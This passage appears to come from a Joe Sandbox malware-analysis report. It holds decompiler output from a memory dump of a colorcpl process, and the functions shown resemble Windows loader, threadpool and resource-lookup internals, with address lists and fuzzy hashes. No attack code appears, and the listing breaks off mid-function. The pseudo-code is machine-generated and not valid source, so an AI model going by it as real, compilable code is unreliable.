				_t70 = __ecx;
				_t85 = (_t83 & 0xfffffff8) - 0x94;
				_v8 =  *0x443b370 ^ _t85;
				_t74 =  *0x44365fc; // 0x4926397d
				_t68 = _a8;
				_v128 = _t68;
				_t79 =  *0x4435d38; // 0xe1ae83e9
				_t76 = _a4;
				_v132 = _t76;
				if(_t74 == 0) {
					_push(_t74);
					_push(4);
					_push( &_v136);
					_push(0x24);
					_push(0xffffffff);
					if(E04382B20() < 0) {
						L2:
						L04398AA0(_t70, _t74, _t54);
					}
					_t74 = _v136;
					 *0x44365fc = _t74;
				}
				_t71 = 0x20;
				_t70 = _t71 - (_t74 & 0x0000001f);
				asm("ror esi, cl");
				_t80 = _t79 ^ _t74;
				if(_t80 == 0) {
					_t46 = E043F8890(_t68, _t74, _t76, _t80, __eflags,  &_v132, 0x43150b4);
				} else {
					_t70 = _t80;
					 *0x44391e0( &_v132);
					_t46 =  *_t80();
				}
				if(_t46 != 0xffffffff) {
					_t79 = 0;
					if(E0433E0E0(0x4321298, 0, 0, _t85 + 0x10) == 0) {
						_push(2);
						_t74 =  *( *[fs:0x30] + 0x10);
						_v32 = _v32 & 0x00000000;
						_v152 =  *(_t74 + 0x38) >> 1;
						_v40 = 0;
						_v44 =  &_v152;
						_v36 = 0;
						_t70 =  *(_t74 + 0x38) & 0x0000ffff;
						_v24 = _v24 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_v28 =  *((intOrPtr*)(_t74 + 0x3c));
						 *(_t85 + 0x90) =  *(_t74 + 0x38) & 0x0000ffff;
						E04371280(_t68,  *((intOrPtr*)(_t85 + 0x20)), _v144, 0x4321268, 0,  &_v44);
						_t79 = 0;
						E04369A00( *(_t74 + 0x38) & 0x0000ffff,  *((intOrPtr*)(_t85 + 0x18)),  *((intOrPtr*)(_t85 + 0x18)), 0);
					}
					 *((intOrPtr*)(_t85 + 0x34)) =  *((intOrPtr*)(_t68 + 0xb8));
					_v124 = 0xc000041d;
					_push(_t79);
					_v120 =  *(_t76 + 4) | 0x00000001;
					_push(_t68);
					_push( &_v124);
					_v116 = _t76;
					 *(_t85 + 0x44) = _t79;
					_t54 = E04384010();
					goto L2;
				}
				_pop(_t77);
				_pop(_t81);
				_pop(_t69);
				__eflags = _v8 ^ _t85;
				return E04384B50(_t46, _t69, _v8 ^ _t85, _t74, _t77, _t81);
			}

0x043c0443
0x043c044b
0x043c0458
0x043c045f
0x043c0466
0x043c0469
0x043c046e
0x043c0475
0x043c0478
0x043c047e
0x043c0480
0x043c0481
0x043c0487
0x043c0488
0x043c048a
0x043c0493
0x043c0495
0x043c0496
0x043c0496
0x043c049b
0x043c049f
0x043c049f
0x043c04ac
0x043c04ad
0x043c04b3
0x043c04b5
0x043c04b7
0x043c04cc
0x043c04b9
0x043c04ba
0x043c04bc
0x043c04c2
0x043c04c2
0x043c04d4
0x043c04de
0x043c04ef
0x043c04fb
0x043c04fd
0x043c0504
0x043c050f
0x043c0518
0x043c0520
0x043c0524
0x043c052b
0x043c0532
0x043c053a
0x043c0542
0x043c054b
0x043c0565
0x043c056a
0x043c0575
0x043c0575
0x043c0580
0x043c058a
0x043c0592
0x043c0593
0x043c059b
0x043c059c
0x043c059d
0x043c05a1
0x043c05a5
0x00000000
0x043c05a5
0x043c05b6
0x043c05b7
0x043c05b8
0x043c05b9
0x043c05c3

Strings

}9&I, xrefs: 043C0514, 043C04DA
}9&I(, xrefs: 043C045F, 043C049F

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: }9&I$}9&I(
API String ID: 0-3031955773
Opcode ID: 951310c42ccd0aacf9c6669139425d16f02046af3b8e3b2eb42b622910d0f51d
Instruction ID: e1cd31d4b812201438a6db77ea4056caf864218b4ffd448f7c1a2cf866d13fd4
Opcode Fuzzy Hash: 951310c42ccd0aacf9c6669139425d16f02046af3b8e3b2eb42b622910d0f51d
Instruction Fuzzy Hash: 13418C71508351ABE720DF68C841B9BBBE8FF88654F109A2EF598D7251E770A804CF92

Uniqueness

Uniqueness Score: -1.00%

Function 043D314A Relevance: 2.6, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E043D314A(void* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v36;
				char _v44;
				char* _v48;
				short _v50;
				char _v52;
				char* _v56;
				short _v58;
				char _v60;
				intOrPtr* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				short _t29;
				short _t30;
				void* _t31;
				signed char* _t32;
				void* _t42;
				signed char* _t46;
				signed char* _t53;
				void* _t54;
				short _t57;
				intOrPtr* _t61;
				void* _t65;
				void* _t67;
				signed char* _t69;
				void* _t70;
				signed int _t72;

				_t63 = __edx;
				_t74 = (_t72 & 0xfffffff8) - 0x3c;
				_v8 =  *0x443b370 ^ (_t72 & 0xfffffff8) - 0x0000003c;
				_t65 = __ecx;
				_v64 = __edx;
				_t57 = 0x2e;
				_t29 = 0x30;
				_v58 = _t29;
				_t30 = 0x2c;
				_v60 = _t57;
				_v56 = L"LdrResGetRCConfig Enter";
				_v52 = _t30;
				_v50 = _t57;
				_v48 = L"LdrResGetRCConfig Exit";
				_t31 = E04353C40();
				_t53 = 0x7ffe0385;
				if(_t31 == 0) {
					_t32 = 0x7ffe0385;
				} else {
					_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
				}
				_t69 = 0x7ffe0384;
				if(( *_t32 & 0x00000001) != 0) {
					if(E04353C40() == 0) {
						_t46 = 0x7ffe0384;
					} else {
						_t46 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_t63 =  *_t46 & 0x000000ff;
					E043CFC01( &_v60,  *_t46 & 0x000000ff);
				}
				if(_v64 == 0 || _t65 == 0 || _t65 == 0xffffffff) {
					_t66 = 0xc000000d;
					goto L14;
				} else {
					_push(5);
					_push(0x18);
					_push( &_v36);
					_push( &_v44);
					_push(_t65);
					_t42 = E04382AA0();
					_t66 = _t42;
					if(_t42 < 0) {
						L20:
						_pop(_t67);
						_pop(_t70);
						_pop(_t54);
						return E04384B50(_t66, _t54, _v8 ^ _t74, _t63, _t67, _t70);
					}
					_t61 = _v64;
					 *_t61 = _v28;
					 *((intOrPtr*)(_t61 + 4)) = _v24;
					L14:
					if(E04353C40() != 0) {
						_t53 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t53 & 0x00000001) != 0) {
						if(E04353C40() != 0) {
							_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_t63 =  *_t69 & 0x000000ff;
						E043CFC01( &_v52,  *_t69 & 0x000000ff);
					}
					goto L20;
				}
			}

0x043d314a
0x043d3152
0x043d315c
0x043d3165
0x043d3167
0x043d316b
0x043d316e
0x043d3171
0x043d3176
0x043d3177
0x043d317c
0x043d3184
0x043d3189
0x043d318e
0x043d3196
0x043d319b
0x043d31a2
0x043d31b4
0x043d31a4
0x043d31ad
0x043d31ad
0x043d31b9
0x043d31be
0x043d31c7
0x043d31d9
0x043d31c9
0x043d31d2
0x043d31d2
0x043d31db
0x043d31e2
0x043d31e2
0x043d31ec
0x043d3224
0x00000000
0x043d31f7
0x043d31f7
0x043d31f9
0x043d31ff
0x043d3204
0x043d3205
0x043d3206
0x043d320b
0x043d320f
0x043d326a
0x043d3270
0x043d3271
0x043d3272
0x043d327d
0x043d327d
0x043d3211
0x043d3219
0x043d321f
0x043d3229
0x043d3230
0x043d323b
0x043d323b
0x043d3244
0x043d324d
0x043d3258
0x043d3258
0x043d325e
0x043d3265
0x043d3265
0x00000000
0x043d3244

Strings

LdrResGetRCConfig Enter, xrefs: 043D317C
LdrResGetRCConfig Exit, xrefs: 043D318E

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 7d7da99ec4838f096d93a3a5b5fa6b6cc4be86f43b4c60ddec65a989cb4011ec
Instruction ID: 8d983d68aea0964d27ebf87778fe927181b0e3f9c7d8ef089ec14f7755522dc8
Opcode Fuzzy Hash: 7d7da99ec4838f096d93a3a5b5fa6b6cc4be86f43b4c60ddec65a989cb4011ec
Instruction Fuzzy Hash: 0D31CF322087419BE315DF68E844B2AB7E8EF89754F042869FC658B390EB35ED05CB53

Uniqueness

Uniqueness Score: -1.00%

Function 043731BE Relevance: 2.6, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E043731BE(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x443b370 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(L043558B0(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E04384B50(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E04382D80();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E04382A80();
					E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					E04353BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x043731c6
0x043731d0
0x043731db
0x043731df
0x043731e0
0x043731e6
0x043731e7
0x043731e8
0x043731e9
0x043731ec
0x043731ee
0x043731f6
0x043732ae
0x04373275
0x04373279
0x0437327a
0x0437327b
0x04373286
0x04373286
0x04373200
0x04373204
0x0437320b
0x0437328b
0x04373293
0x04373297
0x0437320d
0x0437320d
0x0437320d
0x0437320f
0x04373217
0x0437321f
0x04373224
0x0437322c
0x0437322d
0x04373235
0x04373239
0x0437323d
0x04373242
0x04373246
0x0437324a
0x043732a3
0x043732a7
0x00000000
0x00000000
0x043b27e6
0x043b27e9
0x043b27f9
0x00000000
0x0437324c
0x0437324c
0x0437325a
0x04373261
0x04373287
0x04373263
0x04373269
0x043732b6
0x043732b6
0x04373269
0x04373273
0x00000000
0x04373273

Strings

@, xrefs: 0437322D
.Local\, xrefs: 043731D5

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: e46ce7f595d8a1b60853ad07137a1e1d1ad6f1b0f8cc34c19739078c21d00672
Instruction ID: ffc035e41d4ea3c7faaa68b5c7a423efed095995caeaef28fd0fa02941c64da4
Opcode Fuzzy Hash: e46ce7f595d8a1b60853ad07137a1e1d1ad6f1b0f8cc34c19739078c21d00672
Instruction Fuzzy Hash: F1318471609705AFD721DF28C880A5BBBE8FF85654F00192EFED583650E639ED04EB92

Uniqueness

Uniqueness Score: -1.00%

Function 0437A4F0 Relevance: 2.5, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0437A4F0() {
				char _v1052;
				signed int _v1056;
				void* __ebp;
				intOrPtr _t12;
				void* _t15;
				intOrPtr _t19;
				intOrPtr* _t20;
				void* _t22;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t29;

				_push(L"Cleanup Group");
				_push(L"Threadpool!");
				_push(0);
				_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
				_t12 = E0437A580(_t22, _t23, _t24, _t25, _t29);
				_v1056 = _v1056 & 0x00000000;
				 *0x4436644 = _t12;
				_push( &_v1056);
				_push(0x408);
				_push( &_v1052);
				_push(0x37);
				_t15 = E04382D10();
				if(_t15 >= 0) {
					if(_v1056 < 4) {
						return 0xc00000e5;
					}
					 *0x4436640 = _v1052 + 1;
					_t19 =  *[fs:0x30];
					 *(_t19 + 0x250) =  *(_t19 + 0x250) & 0x00000000;
					_t20 = _t19 + 0x254;
					 *((intOrPtr*)(_t20 + 4)) = _t20;
					 *_t20 = _t20;
					return 0;
				}
				return _t15;
			}

0x0437a504
0x0437a509
0x0437a50e
0x0437a510
0x0437a513
0x0437a518
0x0437a51d
0x0437a526
0x0437a527
0x0437a530
0x0437a531
0x0437a533
0x0437a53a
0x0437a541
0x00000000
0x0437a56a
0x0437a548
0x0437a54d
0x0437a553
0x0437a55a
0x0437a55f
0x0437a562
0x00000000
0x0437a564
0x0437a569

Strings

Cleanup Group, xrefs: 0437A504
Threadpool!, xrefs: 0437A509

Memory Dump Source

Source File: 00000003.00000002.7561551420.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: true

Associated: 00000003.00000002.7561551420.0000000004439000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.7561551420.000000000443D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_4310000_colorcpl.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: adff92534e97002257992eb7840ec5b455a61eaa6f009b03d82e59a81b89b71f
Instruction ID: 2cce96b85e2e8b6af6072724a86e986c1c27dab2e3fd9006fd7da5dc2eadedc0
Opcode Fuzzy Hash: adff92534e97002257992eb7840ec5b455a61eaa6f009b03d82e59a81b89b71f
Instruction Fuzzy Hash: D10181B2254740AFE321EF14CD45B1677F8EB44B2AF01897AE598C7590E778E904CB46

Uniqueness

Uniqueness Score: -1.00%

Function 0434C6E0 Relevance: 2.2, Strings: 1, Instructions: 960
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E0434C6E0(signed int __ecx, signed int __edx, signed int _a4, signed int _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _v56;
				char _v60;
				signed short _v64;
				char _v65;
				signed int _v72;
				signed int _v76;
				signed char _v80;
				signed int _v84;
				signed int _v88;
				intOrPtr* _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int* _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void* _v140;
				signed char _v144;
				signed int _v148;
				signed int _v152;
				char _v153;
				signed char _v160;
				signed int _v164;
				void* _v168;
				signed int _v172;
				signed short _v176;
				signed short _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				void* _v196;
				signed int _v200;
				char _v204;
				intOrPtr _v208;
				signed int _v212;
				char _v220;
				char _v228;
				signed int __ebx;
				signed int __edi;
				signed int __esi;
				void* __ebp;
				signed int _t428;
				signed int _t429;
				signed int _t435;
				signed char _t437;
				signed int _t443;
				signed int _t446;
				signed char _t448;
				signed int _t461;
				signed int _t463;
				signed int _t465;
				signed short _t475;
				signed int _t478;
				signed int* _t480;
				signed int _t481;
				signed short _t482;
				signed int _t486;
				signed char _t488;
				signed int _t501;
				signed int _t503;
				signed int _t509;
				signed int _t510;
				signed int _t520;
				signed int _t536;
				signed int _t537;
				signed int _t539;
				signed int _t540;
				signed int _t543;
				signed int _t544;
				signed int _t546;
				signed int _t551;
				signed int _t555;
				void* _t556;
				signed int _t559;
				signed int _t565;
				signed char _t566;
				signed int _t567;
				signed int _t568;
				signed int _t569;
				signed int _t573;
				signed short _t576;
				char _t581;
				signed int _t583;
				signed int _t587;
				signed int _t588;
				signed int _t592;
				intOrPtr _t598;
				signed int _t599;
				signed int _t601;
				signed int* _t602;
				signed int _t607;
				signed int _t615;
				signed int _t617;
				signed int _t620;
				signed int _t624;
				void* _t625;
				signed int _t626;
				signed int _t627;
				intOrPtr* _t630;
				intOrPtr _t633;
				signed int _t638;
				void* _t639;
				signed char _t640;
				intOrPtr* _t642;
				signed int _t645;
				signed int _t647;
				void* _t648;

				_t612 = __edx;
				_push(0xfffffffe);
				_push(0x441c008);
				_push(E0438AD20);
				_push( *[fs:0x0]);
				_t428 =  *0x443b370;
				_v12 = _v12 ^ _t428;
				_t429 = _t428 ^ _t647;
				_v32 = _t429;
				_push(_t429);
				 *[fs:0x0] =  &_v20;
				_v28 = _t648 - 0xd0;
				_v100 = __edx;
				_t624 = __ecx;
				_v96 = __ecx;
				_v152 = __edx;
				_v108 = _a12;
				_v92 = __edx;
				_v65 = 0;
				_v172 = 0;
				_v164 = 0;
				_t638 = _a4;
				_t555 = _a8;
				if(_t638 >= 3 || (_t555 & 0x00000002) != 0) {
					if(_t638 > 4) {
						goto L232;
					}
					_t435 = _t555 & 0x00000041;
					if(_t435 == 0 || _t638 == 4) {
						if(_t638 != 4) {
							L9:
							_t565 = _t638;
							_v88 = _t638;
							L10:
							_v124 = _t565;
							_v8 = 0;
							_t437 =  !_t555;
							_v144 = _t437;
							if((_t437 & 0x00000010) == 0) {
								L25:
								_v80 = 1;
								_t566 = _v96;
								_t640 = _t566;
								_v160 = _t566;
								_v120 = 0;
								_t626 = 0;
								_v128 = 0;
								if((_t566 & 0x00000003) != 0) {
									asm("sbb al, al");
									_v80 =  !( ~(_t566 & 0x00000001)) & 0x00000001;
									_v160 = _t640;
								}
								_t612 = E0434E580(1, _t640, 0, 0,  &_v120);
								_t567 = _v120;
								if(_t567 == 0) {
									L76:
									if(_t612 >= 0) {
										L79:
										_v188 = _t626;
										if(_t626 != 0) {
											_t432 = E0434AB70(_t555, _t626, _t640, __eflags, _v96,  &_v172, 0x100, 1);
											_v72 = _t432;
											__eflags = _t432;
											if(_t432 < 0) {
												L68:
												_v8 = 0xfffffffe;
												goto L233;
											}
											_v148 = _t626;
											_v76 = 0xeeee;
											_v116 = 0;
											_t568 = 0;
											_v136 = 0;
											_v132 = 0;
											_v64 = 0;
											__eflags = 0;
											_v84 = 0;
											_v168 = 0;
											while(1) {
												__eflags = _t626;
												if(_t626 == 0) {
													goto L90;
												}
												_t481 = _v124;
												_t617 = _t481 - 1;
												_v124 = _t617;
												__eflags = _t481;
												if(_t481 == 0) {
													goto L90;
												}
												__eflags = _t617;
												_t612 = _v88;
												if(_t617 == 0) {
													__eflags = _t612 - 3;
													if(_t612 == 3) {
														_v132 = _t626;
													}
												}
												__eflags = _v132;
												if(_v132 == 0) {
													L169:
													_t576 =  *(_t626 + 0xe) & 0x0000ffff;
													_v176 = _t576;
													_v180 =  *(_t626 + 0xc) & 0x0000ffff;
													_t612 = _t576 & 0x0000ffff;
													_t432 = E043394A3( *(_t626 + 0xc) & 0xffff, _t576 & 0x0000ffff,  &_v204);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t612 = 8;
													_t432 = E04396D10(_v204, 8,  &_v220);
													_v72 = _t432;
													__eflags = _t432;
													if(_t432 < 0) {
														goto L68;
													}
													_t306 = _t626 + 0x10; // 0x10
													_t612 = _t306;
													_v212 = _t612;
													_t629 = _v96;
													_t581 = (_v96 & 0xfffffffc) + _v172;
													_v140 = _t581;
													__eflags = _v220 + _t612 - _t581;
													if(_v220 + _t612 <= _t581) {
														_t475 = _v180;
														_v144 = _t475;
														_t583 =  *_v100;
														__eflags = _t583 & 0xffff0000;
														if((_t583 & 0xffff0000) == 0) {
															_t612 = _t612 + (_t475 & 0x0000ffff) * 8;
															_v212 = _t612;
															_t475 = _v176;
															_v144 = _t475;
														}
														__eflags = _t475;
														if(_t475 != 0) {
															__eflags = _v132;
															if(_v132 == 0) {
																L206:
																_t612 = _v172;
																_t478 = E04396E26(_t629, _v172, _v144, _v188, _v172, _t583,  &_v148,  &_v136);
																__eflags = _t478;
																if(_t478 == 0) {
																	goto L172;
																}
																_t480 =  &(_v100[1]);
																_v100 = _t480;
																_v152 = _t480;
																_t626 = _v148;
																_t568 = _v136;
																continue;
															}
															__eflags = _t555 & 0x00000020;
															if((_t555 & 0x00000020) == 0) {
																goto L206;
															}
															_t626 = 0;
															_v148 = 0;
															_v76 =  *_t612;
															_t568 =  *((intOrPtr*)(_t612 + 4)) + _v188;
															__eflags = _t568 - _v140;
															if(_t568 > _v140) {
																goto L172;
															}
															_v136 = _t568;
															goto L90;
														} else {
															_t587 = _v88;
															_t486 = _t587 - _v124 - 1;
															__eflags = _t486;
															if(_t486 == 0) {
																_t645 = 0xc000008a;
																L183:
																_v72 = _t645;
																_t630 = _v92;
																__eflags = _t555 & 0x02040000;
																if((_t555 & 0x02040000) != 0) {
																	L191:
																	__eflags = _t645 - 0xc000008a;
																	if(_t645 == 0xc000008a) {
																		L193:
																		_t488 =  !_t555;
																		__eflags = _t488 & 0x00080000;
																		if((_t488 & 0x00080000) != 0) {
																			__eflags = _t488 & 0x00020000;
																			if((_t488 & 0x00020000) != 0) {
																				__eflags = _t488 & 0x00000010;
																				if((_t488 & 0x00000010) != 0) {
																					__eflags = _t587 - 3;
																					if(_t587 == 3) {
																						_v48 =  *_t630;
																						_v44 =  *((intOrPtr*)(_t630 + 4));
																						_v40 =  *((intOrPtr*)(_t630 + 8));
																						_t588 = _a4;
																						__eflags = _t588 - 4;
																						if(_t588 == 4) {
																							_v36 =  *((intOrPtr*)(_t630 + 0xc));
																						}
																						_t612 =  &_v48;
																						_t558 = _v96;
																						_t645 = E0434B9C0(_v96,  &_v48, _t588, _t555, _v108);
																						_v72 = _t645;
																						__eflags = _t645;
																						if(_t645 >= 0) {
																							_t612 = 0;
																							__eflags = 0;
																							E04340C12(_t558, 0,  &_v48, _a4);
																						}
																					}
																				}
																			}
																		}
																		L201:
																		_v8 = 0xfffffffe;
																		_t432 = _t645;
																		goto L233;
																	}
																	__eflags = _t645 - 0xc000008b;
																	if(_t645 != 0xc000008b) {
																		goto L201;
																	}
																	goto L193;
																}
																__eflags = _t587 - 3;
																if(_t587 != 3) {
																	goto L191;
																}
																_v48 =  *_t630;
																_v44 =  *((intOrPtr*)(_t630 + 4));
																_v40 =  *((intOrPtr*)(_t630 + 8));
																_t592 = _a4;
																__eflags = _t592 - 4;
																if(_t592 == 4) {
																	_v36 =  *((intOrPtr*)(_t630 + 0xc));
																}
																_t612 =  &_v48;
																_t501 = E0434B9C0(_v96,  &_v48, _t592, _t555 | 0x01000000, _v108);
																_t587 = _v88;
																__eflags = _t501 - 0xc00b0001;
																if(_t501 != 0xc00b0001) {
																	__eflags = _t501 - 0xc00b0006;
																	if(_t501 == 0xc00b0006) {
																		goto L191;
																	}
																	_t645 = _t501;
																	L190:
																	_v72 = _t645;
																}
																goto L191;
															}
															_t503 = _t486 - 1;
															__eflags = _t503;
															if(_t503 == 0) {
																_t645 = 0xc000008b;
																goto L183;
															}
															__eflags = _t503 == 1;
															if(_t503 == 1) {
																_v72 = 0xc0000204;
																_v8 = 0xfffffffe;
																_t432 = 0xc0000204;
																goto L233;
															}
															_t645 = 0xc000000d;
															_t630 = _v92;
															goto L190;
														}
													}
													L172:
													_v8 = 0xfffffffe;
													_t432 = 0xc000007b;
													goto L233;
												} else {
													_v64 = 0;
													_t482 =  *((intOrPtr*)(_v92 + 8));
													_v84 = _t482;
													__eflags = 0x000003ff & _t482;
													_v65 = (0x000003ff & _t482) == 0;
													L107:
													_t465 = _v116;
													_v116 = _v116 + 1;
													__eflags = _t465 - 0xc;
													if(_t465 > 0xc) {
														L129:
														_v8 = 0xfffffffe;
														_t432 = 0xc0000204;
														goto L233;
													}
													switch( *((intOrPtr*)(_t465 * 4 +  &M0434D420))) {
														case 0:
															__eflags = 0 - _v84;
															if(0 != _v84) {
																__eflags = _t555 & 0x00080000;
																if((_t555 & 0x00080000) == 0) {
																	goto L139;
																}
																goto L112;
															}
															goto L110;
														case 1:
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) == 0) {
																goto L139;
															}
															__eflags = __eax & 0x00020000;
															if((__eax & 0x00020000) == 0) {
																goto L139;
															}
															__eflags = __al & 0x00000010;
															if((__al & 0x00000010) == 0) {
																goto L139;
															}
															__eax =  *__ecx;
															_v48 =  *__ecx;
															__eflags = __edx - 2;
															if(__edx < 2) {
																__eax = 0;
																__eflags = 0;
															} else {
																__eax =  *(__ecx + 4);
															}
															_v44 = __eax;
															__eflags = __edx - 3;
															if(__edx != 3) {
																__eax = 0;
																__eflags = 0;
															} else {
																__eax =  *(__ecx + 8);
															}
															_v40 = __eax;
															__edi = _a4;
															__eflags = __edi - 4;
															if(__edi == 4) {
																__eax =  *(__ecx + 0xc);
																_v36 =  *(__ecx + 0xc);
															}
															__edx =  &_v48;
															__ecx = _v96;
															__eax = E0434B9C0(__ecx, __edx, __edi, __ebx, _v108);
															__esi = __eax;
															_v72 = __esi;
															__eflags = __esi;
															if(__esi < 0) {
																goto L139;
															} else {
																__eax =  &_v48;
																__edx = 0;
																__ecx = _v96;
																__eax = E04340C12(__ecx, 0,  &_v48, __edi);
																_v8 = 0xfffffffe;
																__eax = __esi;
																goto L233;
															}
														case 2:
															__eflags = _v65;
															if(_v65 == 0) {
																L112:
																_t643 = _v84;
																_v64 = _t643;
																goto L165;
															}
															__si = _v76;
															_v64 = __si;
															goto L165;
														case 3:
															__eflags = __bl & 0x00000004;
															if((__bl & 0x00000004) == 0) {
																__eflags = _v65;
																if(_v65 == 0) {
																	__edx =  &_v64;
																	__eax = E043388C8(__ecx, __edx);
																	__eflags = __eax;
																	if(__eax < 0) {
																		L110:
																		_t643 = 0;
																		_v64 = 0;
																		goto L165;
																	}
																	__si = _v64;
																	__eflags = __si;
																	if(__si != 0) {
																		_v116 = _v116 - 1;
																	}
																	goto L165;
																}
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															goto L129;
														case 4:
															__eflags = _v65;
															if(_v65 == 0) {
																__si = _v84;
																__si = _v84 & __di;
																_v64 = __si;
															} else {
																__si = _v76;
																_v64 = __si;
															}
															goto L165;
														case 5:
															__eflags = _v65;
															if(_v65 == 0) {
																goto L129;
															}
															goto L139;
														case 6:
															__si = _v76;
															_v64 = __si;
															__eflags = __bl & 0x00000020;
															if((__bl & 0x00000020) != 0) {
																goto L165;
															}
															__eax = 0;
															_v64 = __ax;
															__eax = E0434A630();
															__eflags = __al;
															if(__al == 0) {
																__eax = 0;
																_v64 = __ax;
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															 *[fs:0x18] =  *( *[fs:0x18] + 0xfc0);
															__eax =  *( *( *[fs:0x18] + 0xfc0) + 4) & 0x0000ffff;
															__eflags = _v164 - __eax;
															if(_v164 >= __eax) {
																__eax = 0;
																__eflags = 0;
																_v64 = __ax;
																L146:
																__ebx = _a8;
																__si = _v76;
																_v64 = __si;
																goto L165;
															}
															__edx =  *[fs:0x18];
															 &_v153 =  &_v64;
															__edi = _v164;
															__edx =  *( *[fs:0x18] + 0xfc0);
															__eax = E0434A750(__edx, __edi,  &_v64,  &_v153);
															__si = _v64;
															__eflags = __si;
															if(__si == 0) {
																goto L146;
															}
															__edi = __edi + 1;
															_v164 = __edi;
															_v116 = _v116 - 1;
															__ebx = _a8;
															goto L165;
														case 7:
															__eax = __ebx;
															__eax =  !__ebx;
															__eflags = __eax & 0x00080000;
															if((__eax & 0x00080000) == 0) {
																L139:
																_t643 = _v76;
																_v64 = _t643;
																goto L165;
															}
															__ecx = _v96;
															__eax = E04348858(__ecx, 0, 1);
															__eflags = __eax;
															if(__eax == 0) {
